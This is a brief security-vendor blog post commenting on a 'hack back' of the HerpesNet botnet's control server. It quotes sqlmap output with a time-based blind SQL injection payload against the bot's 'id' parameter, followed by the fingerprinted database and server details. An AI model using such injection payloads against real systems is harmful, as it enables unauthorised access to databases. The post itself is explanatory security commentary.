Blog|Login|中文Deutsche日本語
May 25, 2012
 Interesting Hack Back
Pin It

This hack back of the HerpesNet bot is a must read for any geek.  Not only does it show how the bot works but, more importantly, you see how hackers fail to protect themselves from the very vulnerabilities they exploit.  In this case, the hackers were done it by a blind SQL injection using SQL map:

Place: POST

Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724' AND SLEEP(5) AND 'PtaQ'='PtaQ
---

[08:22:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10
back-end DBMS: MySQL 5.0.11

 

 

 

Share |

Posted by Imperva Blogger at 12:00:00 AM | Tal Be'ery


Comments

Verify your Comment

Previewing your Comment

Posted by:  | 

This is only a preview. Your comment has not yet been posted.

Working...
Your comment could not be posted. Error type:
Your comment has been saved. Comments are moderated and will not appear until approved by the author. Post another comment

The letters and numbers you entered did not match the image. Please try again.

As a final step before posting your comment, enter the letters and numbers you see in the image below. This prevents automated programs from posting comments.

Having trouble reading this image? View an alternate.

Working...

Post a comment

Comments are moderated, and will not appear until the author has approved them.

« Guide to Getting Cyberinsurance | Main | UK’s Cookie Day »

Find Us Online
RSS Feed - Subscribe Twitter Facebook iTunes LinkedIn YouTube
Authors
Monthly Archives
Email Subscription
Sign up here to receive our blog: